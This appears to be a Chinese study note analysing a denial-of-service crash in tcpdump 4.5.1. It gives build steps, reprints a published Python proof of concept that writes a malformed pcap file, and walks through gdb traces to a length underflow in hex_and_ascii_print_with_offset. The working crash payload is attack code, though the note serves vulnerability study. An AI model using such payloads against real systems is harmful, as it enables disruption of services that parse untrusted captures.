[二进制step1]TCPDUMP 4.5.2 拒绝服务漏洞分析

学习来源:

https://whereisk0shl.top/post/2016-10-23-1

https://bbs.kanxue.com/thread-261984.htm

环境

kali-linux-2022.4-vmware-i386（需要 x86 / 32 位的镜像）

下载链接

https://cdimage.kali.org/kali-2022.4/kali-linux-2022.4-vmware-i386.7z

之前用的 Kali-Linux-2019.4-vmware-amd64 镜像安装时一直报错（也可能是网络原因）；下午换了镜像并换了一个网络之后，环境搭建和安装都很顺利。

剩下步骤就按照参考的来

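# Remove the distro tcpdump so the vulnerable build below is the one found on PATH
apt-get --purge remove -y tcpdump
# Build dependencies (lexer/parser generators used by libpcap's filter compiler)
apt install -y flex bison
# libpcap: fetch over HTTPS rather than plain HTTP. tcpdump.org publishes a
# detached signature next to each release tarball on its release page; check
# it before building code that will later run as root.
wget https://www.tcpdump.org/release/libpcap-1.5.3.tar.gz
tar -zxvf libpcap-1.5.3.tar.gz
cd libpcap-1.5.3
./configure
make
make install
# Return to the working directory so libpcap-1.5.3 and tcpdump-4.5.1 end up as
# sibling trees (tcpdump's configure presumably probes ../libpcap-* first —
# TODO confirm); the original listing unpacked tcpdump inside libpcap-1.5.3/.
cd ..
# tcpdump 4.5.1 — the version under analysis
wget https://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
tar -zxvf tcpdump-4.5.1.tar.gz
cd tcpdump-4.5.1
./configure
make
make install
# Confirm the freshly built 4.5.1 binary, not a leftover package, is what runs
tcpdump --version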

因为全新的环境没有调试工具，这里记录一下 gdb 和 gdb-peda 的安装步骤：

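# --- gdb: build from source (the fresh image ships no debugger) ---
# Download over HTTPS; the GNU mirrors also publish a .sig beside each
# tarball that can be checked with gpg before building.
wget https://ftp.gnu.org/gnu/gdb/gdb-11.2.tar.gz
# Unpack
tar -zxvf gdb-11.2.tar.gz
# configure/make must run inside the unpacked tree, not the download directory
# (the original listing omitted this step)
cd gdb-11.2
# Generate the Makefiles
./configure
# Build (this is the compile step, not a "check")
make
# Install into /usr/local
sudo make install
# Verify the installed version
gdb -v

# --- peda: gdb helper plugin ---
git clone https://github.com/longld/peda.git ~/peda
# Auto-load peda on every gdb start; this appends, so run it only once
echo "source ~/peda/peda.py" >> ~/.gdbinit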

调试

poc.py

# Exploit Title: tcpdump 4.5.1 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro
# Vendor Homepage: http://www.tcpdump.org
# Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz
# Version: 4.5.1
# Tested on: Ubuntu 14 LTS

from subprocess import call
from shlex import split
from time import sleep

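def crash():
    """Write the malformed pcap to ./crash and feed it to ``tcpdump -r``.

    The payload is the original 110-byte capture from the published PoC,
    kept byte-for-byte; it is stored as a ``bytes`` literal so the script
    runs unchanged on Python 2 and 3 (a ``str`` literal cannot be written
    to a binary file under Python 3).

    Side effects: creates/overwrites the file ``crash`` in the current
    directory and runs whatever ``tcpdump`` is first on PATH against it.

    Returns:
        The child's exit status from ``subprocess.call`` (a negative value
        ``-N`` means the child was terminated by signal N, e.g. -11 for
        SIGSEGV), or ``None`` if tcpdump could not be launched.
    """
    # Pass the argv list directly; no shell is involved.
    command = ['tcpdump', '-r', 'crash']

    # libpcap file header (magic 0xa1b2c3d4, little-endian) followed by one
    # packet record. NOTE(review): the record's incl_len field (offset 32)
    # is 8, which looks shorter than the 802.15.4 header the printer
    # subtracts; the gdb trace on this page shows length=0xfffffff3 reaching
    # hex_and_ascii_print_with_offset — consistent with a length underflow.
    payload = (
        b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff'
        b'\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00'
        b'\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00'
        b'\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a'
        b"\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'"
        b"xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00"
        b'\x00\x00\x00\x00\x01\x03\x03\x04'
    )

    with open('crash', 'wb') as fh:
        fh.write(payload)

    try:
        rc = call(command)
    except OSError:
        # tcpdump not on PATH / not executable. The original bare ``except``
        # also swallowed KeyboardInterrupt and SystemExit.
        print("Error: Something has gone wrong!")
        return None

    # Printed regardless of exit status, as in the original; inspect the
    # returned code to know whether the child actually crashed.
    print("Exploit successful! ")
    return rc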

def main():
    """Print the banner, pause briefly, then run the crash reproducer."""
    banner = (
        "Author: David Silveiro ",
        " tcpdump version 4.5.1 Access Violation Crash ",
    )
    for line in banner:
        print(line)

    sleep(2)  # short pause so the banner is readable before tcpdump's output
    crash()

if __name__ == "__main__":
    # Only run when executed as a script, not when imported as a module.
    main()

生成crash文件

python2 poc.py

Exploit successful!

crash文件内容

在 gdb 中加载 tcpdump，然后执行 run -r crash：

root@kali:~/tcpdump-dos# gdb tcpdump

gdb-peda$ run -r crash

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3
EBX: 0x51cff4 --> 0x11ce70
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5
EDI: 0x0
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset+156>: movzx esi,BYTE PTR [edx+0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x41a6bf <hex_and_ascii_print_with_offset+143>: mov eax,DWORD PTR [esp+0x14]
0x41a6c3 <hex_and_ascii_print_with_offset+147>: cmp eax,0xffffffff
0x41a6c6 <hex_and_ascii_print_with_offset+150>: je 0x41a7c7 <hex_and_ascii_print_with_offset+407>
=> 0x41a6cc <hex_and_ascii_print_with_offset+156>: movzx esi,BYTE PTR [edx+0x1]
0x41a6d0 <hex_and_ascii_print_with_offset+160>: movzx edi,BYTE PTR [edx]
0x41a6d3 <hex_and_ascii_print_with_offset+163>: add edx,0x2
0x41a6d6 <hex_and_ascii_print_with_offset+166>: sub esp,0xc
0x41a6d9 <hex_and_ascii_print_with_offset+169>: mov DWORD PTR [esp+0x2c],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffdb60 --> 0xf375846
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5
0020| 0xbfffdb74 --> 0x7ffef2b3
0024| 0xbfffdb78 --> 0x0
0028| 0xbfffdb7c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90 s1 = *cp++;

执行bt命令查看函数调用栈:

gdb-peda$ bt
#0 hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t",
cp=0x610000 <error: Cannot access memory at address 0x610000>,
length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
#1 0x0041a8d6 in hex_and_ascii_print (ident=0x4aadef "\n\t",
cp=0x5ee575 "\377\377\377\347\067\020\340\377\377\377\377\350'\017\360\377\377\377\377\351\026\362\340\377\377\377\377\352\006\361\360\377\377\377\377\352\366\324\340\377\377\377\377\353\346\323\360\377\377\377\377\354\340\021", length=0xfffffff3) at ./print-ascii.c:127
#2 0x0046dd13 in ndo_default_print (ndo=0x5ea9c0 <Gndo>,
bp=0x5ee575 "\377\377\377\347\067\020\340\377\377\377\377\350'\017\360\377\377\377\377\351\026\362\340\377\377\377\377\352\006\361\360\377\377\377\377\352\366\324\340\377\377\377\377\353\346\323\360\377\377\377\377\354\340\021", length=0xfffffff3) at ./tcpdump.c:2053
#3 0x0041850c in ieee802_15_4_if_print (ndo=0x5ea9c0 <Gndo>, h=0xbfffde10,
p=<optimized out>) at ./print-802_15_4.c:180
#4 0x0046e348 in print_packet (user=0xbfffdef0 "\300\251^", h=0xbfffde10,
sp=0x5ee560 "@\377") at ./tcpdump.c:1950
#5 0x004905ef in pcap_offline_read (p=0x5ee350, cnt=0xffffffff,
callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "\300\251^")
at ./savefile.c:409
#6 0x004808b3 in pcap_loop (p=0x5ee350, cnt=0xffffffff,
callback=0x46e2f0 <print_packet>, user=0xbfffdef0 "\300\251^")
at ./pcap.c:849
#7 0x004119b5 in main (argc=<optimized out>, argv=0xbffff0f4)
at ./tcpdump.c:1569
#8 0xb7c23295 in ?? () from /lib/i386-linux-gnu/libc.so.6
#9 0xb7c23358 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#10 0x00412747 in _start ()
gdb-peda$

函数调用过程

_start ()

__libc_start_main() libc.so.6

main tcpdump.c:1569

pcap_loop pcap.c:849

pcap_offline_read savefile.c:409

print_packet tcpdump.c:1950

ieee802_15_4_if_print print-802_15_4.c:180

ndo_default_print ./tcpdump.c:2053

hex_and_ascii_print ./print-ascii.c:127

hex_and_ascii_print_with_offset print-ascii.c:90

漏洞成因是打印时引用了非法地址：从上面的调用栈可以看到 hex_and_ascii_print_with_offset 收到的 length=0xfffffff3（即 -13 被当作无符号数使用），于是逐字节打印时一直读过缓冲区末尾，直到访问未映射的地址 0x610000 而触发 SIGSEGV。

gdb-peda$ s

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x7ffef2b3
EBX: 0x51cff4 --> 0x11ce70
ECX: 0x2e ('.')
EDX: Cannot access memory address
ESI: 0x5
EDI: 0x0
EBP: 0xbfffdbdd ("......")
ESP: 0xbfffdb60 --> 0xf375846
EIP: 0x41a6cc (<hex_and_ascii_print_with_offset+156>: movzx esi,BYTE PTR [edx+0x1])
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x41a6bf <hex_and_ascii_print_with_offset+143>: mov eax,DWORD PTR [esp+0x14]
0x41a6c3 <hex_and_ascii_print_with_offset+147>: cmp eax,0xffffffff
0x41a6c6 <hex_and_ascii_print_with_offset+150>: je 0x41a7c7 <hex_and_ascii_print_with_offset+407>
=> 0x41a6cc <hex_and_ascii_print_with_offset+156>: movzx esi,BYTE PTR [edx+0x1]
0x41a6d0 <hex_and_ascii_print_with_offset+160>: movzx edi,BYTE PTR [edx]
0x41a6d3 <hex_and_ascii_print_with_offset+163>: add edx,0x2
0x41a6d6 <hex_and_ascii_print_with_offset+166>: sub esp,0xc
0x41a6d9 <hex_and_ascii_print_with_offset+169>: mov DWORD PTR [esp+0x2c],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffdb60 --> 0xf375846
0004| 0xbfffdb64 --> 0xb7fc34a0 --> 0xb7c00000 --> 0x464c457f
0008| 0xbfffdb68 --> 0xb7c09934 --> 0x0
0012| 0xbfffdb6c --> 0xbfffdbc3 --> 0x30303000 ('')
0016| 0xbfffdb70 --> 0x5
0020| 0xbfffdb74 --> 0x7ffef2b3
0024| 0xbfffdb78 --> 0x0
0028| 0xbfffdb7c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
hex_and_ascii_print_with_offset (ident=0x4aadef "\n\t", cp=0x610000 <error: Cannot access memory at address 0x610000>, length=0xfffffff3, oset=0x21a80) at ./print-ascii.c:90
90 s1 = *cp++;
gdb-peda$